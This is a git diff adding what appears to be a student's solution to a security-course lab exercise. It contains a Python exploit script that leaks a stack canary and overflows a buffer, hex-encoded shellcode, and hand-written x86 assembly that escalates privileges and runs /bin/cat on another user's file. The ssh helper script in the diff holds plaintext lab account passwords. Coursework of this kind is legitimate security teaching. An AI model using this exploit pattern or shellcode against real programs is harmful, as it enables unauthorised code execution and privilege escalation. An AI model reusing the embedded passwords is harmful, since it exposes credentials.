diff --git a/proj1/solution/interact4 b/proj1/solution/interact4
new file mode 100755
index 0000000000000000000000000000000000000000..2d70f7bd9702d4cfb9d486cc96a42dba083fab98
--- /dev/null
+++ b/proj1/solution/interact4
@@ -0,0 +1,72 @@
+#!/usr/bin/env python2
+
+from scaffold import *
+
+### YOUR CODE STARTS HERE ###
+import tempfile, subprocess
+def py3in2(func_text, arg):
+ # escape char in arg should be escaped twice.
+ payload = ['#/usr/bin/env python3', 'def _func(arg):']
+ for line in func_text.split('\n'):
+ payload.append(' ' + line)
+ payload.append('with open("/dev/fd/1", "w") as f:\n f.write(_func(\''+arg+'\'))\n')
+ payload = '\n'.join(payload)
+
+ with tempfile.NamedTemporaryFile() as tf:
+ tf.file.write(payload)
+ tf.file.close()
+ output = subprocess.check_output(["python3", tf.name], stderr=subprocess.PIPE)
+ return output
+
+def fuck_raddr(txt, rev=True):
+ def fuck8(txt):
+ assert(len(txt) == 8)
+ return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]
+
+ def revert(txt):
+ assert(len(txt) % 8 == 0)
+ res = ""
+ for i in range(int(len(txt) / 8)):
+ res += fuck8(txt[i*8:(i+1)*8])
+ return res
+
+ import binascii
+ if rev:
+ txt = revert(txt)
+ b = binascii.unhexlify(txt)
+ return b
+
+############# real code begin
+payload1 = '0123456789ab\\x' + '\n'
+p.send(payload1)
+reply1 = p.recvline()
+reply_canary = reply1[13:17]
+
+fill1 = "1"*16
+canary = reply_canary
+fill2 = "\0"*8
+retaddr = fuck_raddr("bffffaf4") # "bffffaf4"
+#payload = fuck_raddr("6a3158cd8089c389c16a4658cd8031c050682f2f6c73682f62696e545b505389e131d2b00bcd800a", False) # SHELLCODE
+payload = fuck_raddr("6a3158cd8089c389c16a4658cd8031c050682f636174682f62696e545b506841444d45682f2f524568652f6a7a682f686f6d545950515389e131d2b00bcd80", False) # SHELLCODE
+#payload = SHELLCODE
+
+msg = fill1 + canary + fill2 + retaddr + payload + '\n'
+#print(msg)
+p.send(msg)
+print(p.recvline())
+print(p.recvline())
+print(p.recvline())
+print(p.recvline())
+print(p.recvline())
+
+# HINT: the last line of your exploit should look something like:
+# p.send('A' * m + canary + 'B' * n + rip + SHELLCODE + '\n')
+# where m, canary, n and rip are all values you must determine
+
+### YOUR CODE ENDS HERE ###
+
+returncode = p.end()
+
+if returncode == -11: print 'segmentation fault or stack canary!'
+elif returncode != 0: print 'return code', returncode
+
diff --git a/proj1/solution/payload4.s b/proj1/solution/payload4.s
new file mode 100644
index 0000000000000000000000000000000000000000..6053d793a47c4f0b6c4c8c4148e7aa5700afb308
--- /dev/null
+++ b/proj1/solution/payload4.s
@@ -0,0 +1,58 @@
+// recolic: the shellcode provided by cs161 doesn't work.
+// so I have to rewrite it for proj1 problem4
+
+push $0x31
+pop %eax
+int $0x80
+mov %eax,%ebx
+mov %eax,%ecx
+push $0x46
+pop %eax
+int $0x80
+
+xor %eax,%eax
+
+// \0\0\0\0
+push %eax
+// /bin /cat
+push $0x7461632f
+push $0x6e69622f
+
+//mov %esp %ebx
+push %esp
+pop %ebx
+
+// \0\0\0\0
+push %eax
+// /hom e/jz //RE ADME
+push $0x454d4441
+push $0x45522f2f
+push $0x7a6a2f65
+push $0x6d6f682f
+
+//mov %esp %ecx
+push %esp
+pop %ecx
+
+
+//// \0\0\0\0
+//push %eax
+//// /bin //ls
+//push $0x736c2f2f
+//push $0x6e69622f
+//
+//push %esp
+//pop %ebx
+
+// \0\0\0\0 NULL
+push %eax
+// &arg[1]
+push %ecx
+// &arg[0]
+push %ebx
+
+mov %esp,%ecx
+xor %edx,%edx
+mov $0xb,%al
+int $0x80
+
diff --git a/proj1/ssh.sh b/proj1/ssh.sh
index cf5d074634db9ec39a965c989590b85bacaf9d20..a0e22d96aa70eee5a71e69ded40de1303c743ab3 100755
--- a/proj1/ssh.sh
+++ b/proj1/ssh.sh
@@ -7,5 +7,7 @@ else
echo 'Connecting localhost...'
#sshpass -p r4e8kWpeFC ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no vsftpd@localhost -p 16161
#sshpass -p 37ZFBrAPm8 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no smith@localhost -p 16161
- sshpass -p mXFLFR5C62 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no brown@localhost -p 16161
+ #sshpass -p mXFLFR5C62 ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no brown@localhost -p 16161
+ sshpass -p cqkeuevfIO ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no jz@localhost -p 16161
+
fi